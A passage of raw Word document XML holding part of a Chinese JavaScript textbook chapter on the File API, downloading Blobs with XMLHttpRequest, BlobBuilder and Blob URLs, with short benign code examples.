      <w:r>
        <w:t>对象。一个</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象就是一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>，除此之外，还多了</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>lastModifiedDate</w:t>
      </w:r>
      <w:r>
        <w:t>属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>输出选中的文件列表相关的信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function fileinfo(files){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>files.length;i++){//files</w:t>
      </w:r>
      <w:r>
        <w:t>是一个类数组对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var f=files[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(f.name,//</w:t>
      </w:r>
      <w:r>
        <w:t>只是名字：没有路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.size,f.type,//size</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.lastModifiedDate);//</w:t>
      </w:r>
      <w:r>
        <w:t>另外一个</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>允许选择多个图片文件并将它们传递给</w:t>
      </w:r>
      <w:r>
        <w:t>fileinfo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>input type="file"accept="image/*"multiple onchange="fileinfo(this.files)"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>能够显示选中文件的名字、类型和大小并没有多大意义。</w:t>
      </w:r>
      <w:r>
        <w:t>22.6.4</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>22.6.5</w:t>
      </w:r>
      <w:r>
        <w:t>节将会介绍如何真正操作文件内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除</w:t>
      </w:r>
      <w:r>
        <w:t>了通过＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素来选择文件之外，用户还可以通过将本地文件放到浏览器中来给予脚本访问它们的权限。当应用接收到一个</w:t>
      </w:r>
      <w:r>
        <w:t>drop</w:t>
      </w:r>
      <w:r>
        <w:t>事件，事件对象的</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer.files</w:t>
      </w:r>
      <w:r>
        <w:t>属性就会和放入的</w:t>
      </w:r>
      <w:r>
        <w:t>FileList</w:t>
      </w:r>
      <w:r>
        <w:t>进行关联（如果有的话）。拖放</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>17.7</w:t>
      </w:r>
      <w:r>
        <w:t>节中介绍过，例</w:t>
      </w:r>
      <w:r>
        <w:t>22-10</w:t>
      </w:r>
      <w:r>
        <w:t>会展示如何在文件中使用该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="559" w:name="22_6_2_Xia_Zai_Blob"/>
      <w:r>
        <w:t>22.6.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　下载</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:bookmarkEnd w:id="559"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍了使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>，同时还介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest Level 2</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>）标准草案中定义的一些新特性。截至撰写本</w:t>
      </w:r>
      <w:r>
        <w:t>书时，</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一种将</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>指定的内容以</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的形式下载下来，但是浏览器还不支持它。由于代码还无法测试（浏览器不支持），因此，本节只简单地介绍操作</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>XHR2 API</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>18-2</w:t>
      </w:r>
      <w:r>
        <w:t>介绍过如何将</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>指定的内容以纯文本的形式下载下来，与之不同的是，例</w:t>
      </w:r>
      <w:r>
        <w:t>22-9</w:t>
      </w:r>
      <w:r>
        <w:t>展示了从</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>下载一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的基本技术：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-9</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>下载</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的形式获取</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>指定的内容，并将其传递给指定的回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里的代码没有测试过：因为截至撰写本书时，没有一个浏览器支持该</w:t>
      </w:r>
      <w:r>
        <w:t>AP</w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getBlob(url,callback){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var xhr=new XMLHttpRequest();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>XHR</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.open("GET",url);//</w:t>
      </w:r>
      <w:r>
        <w:t>指定要获取内容的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.responseType="blob"//</w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的形式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.onload=function(){//onload</w:t>
      </w:r>
      <w:r>
        <w:t>比</w:t>
      </w:r>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>更容易</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>callback(xhr.response);//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>传递给回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意，这里是</w:t>
      </w:r>
      <w:r>
        <w:t>.response</w:t>
      </w:r>
      <w:r>
        <w:t>，不是</w:t>
      </w:r>
      <w:r>
        <w:t>.responseText</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.send(null);//</w:t>
      </w:r>
      <w:r>
        <w:t>发送请求</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如果要下载的数据量很大，想要在下载过程中显示一个进度条，那么可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>onprogress</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序，这部分将在</w:t>
      </w:r>
      <w:r>
        <w:t>22.6.5</w:t>
      </w:r>
      <w:r>
        <w:t>节中进行相应介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="560" w:name="22_6_3_Gou_Zao_Blob"/>
      <w:r>
        <w:t>22.6.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　构造</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:bookmarkEnd w:id="560"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>通常表示来自诸如本地文件、</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>以及数据库外部资源的大数据块。然而，有的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用想要创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>，并将其上</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>传到</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>上或者存储到一个文件或者数据库中或者传递给另一个线程。要从自己的数据来创建</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>，可以</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>BlobBuilder</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>BlobBuilder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bb=new BlobBuilder();//</w:t>
      </w:r>
      <w:r>
        <w:t>把一个字符串追加到</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>中，并以一个</w:t>
      </w:r>
      <w:r>
        <w:t>NUL</w:t>
      </w:r>
      <w:r>
        <w:t>字符标记为字符串结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bb.append("This blob contains this text and 10 big-endian 32-bit signed ints.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bb.append("\0");//NUL</w:t>
      </w:r>
      <w:r>
        <w:t>结束符表示字符串的结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将数据存储到</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ab=new ArrayBuffer(4*</w:t>
      </w:r>
      <w:r>
        <w:t>10);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var dv=new DataView(ab);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>10;i++)dv.setInt32(i*4,i);//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>添加到</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bb.append(ab);//</w:t>
      </w:r>
      <w:r>
        <w:t>现在从</w:t>
      </w:r>
      <w:r>
        <w:t>builder</w:t>
      </w:r>
      <w:r>
        <w:t>中获取</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>，并指定</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var blob=bb.getBlob("x-optional/mime-type-here");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在本节一开始介绍过</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>有一个</w:t>
      </w:r>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，用于将</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>拆分成多个片段。通过将多个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>传递给</w:t>
      </w:r>
      <w:r>
        <w:t>BlobBuilder</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:t>end()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以实现将多个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>合并在一起。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="561" w:name="22_6_4_Blob_URL"/>
      <w:r>
        <w:t>22.6.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="561"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>前面章节介绍过如何获取或者创建</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>。现在来介绍如何对获取的或者创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>进行操作。其中最简单的就是可以创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>来指向该</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>。随后，可以以一般的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>形式在任何地方使用该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>：在</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>中，在样式表中，甚至可以作为</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>的目标。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>createObjectURL()</w:t>
      </w:r>
      <w:r>
        <w:t>函数可以创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>。截至撰写本书时，标准草案和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Firefox </w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>都是将该函数放在全局对象中，命名为</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Webkit</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器则在</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>前加上了前缀，命名为</w:t>
      </w:r>
      <w:r>
        <w:t>webkitURL</w:t>
      </w:r>
      <w:r>
        <w:t>。早期标准（以及早期浏览器的实现）直接将该函数放在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上。可以使用如下代码，实现跨浏览器创建</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var getBlobURL=(window.URL</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>URL.createObjectURL.bind(URL))||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(window.webkitURL</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>webkitURL.createObjectURL.bind(webkitURL))||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>.createObjectURL;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web Workers</w:t>
      </w:r>
      <w:r>
        <w:t>也允许使用该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>和访问同样的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>（或者</w:t>
      </w:r>
      <w:r>
        <w:t>webkitURL</w:t>
      </w:r>
      <w:r>
        <w:t>）对象上同样的函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传递一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>createObjectURL()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>（以普通字符串形式）。该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>blob://</w:t>
      </w:r>
      <w:r>
        <w:t>开始，紧跟着是一小串文本字符串，该字符串用不透明的唯一标识符来标识</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>。要注意的是，这和</w:t>
      </w:r>
      <w:r>
        <w:t>data://URL</w:t>
      </w:r>
      <w:r>
        <w:t>是不同的，</w:t>
      </w:r>
      <w:r>
        <w:t>data://URL</w:t>
      </w:r>
      <w:r>
        <w:t>会对内容进行编码。</w:t>
      </w:r>
      <w:r>
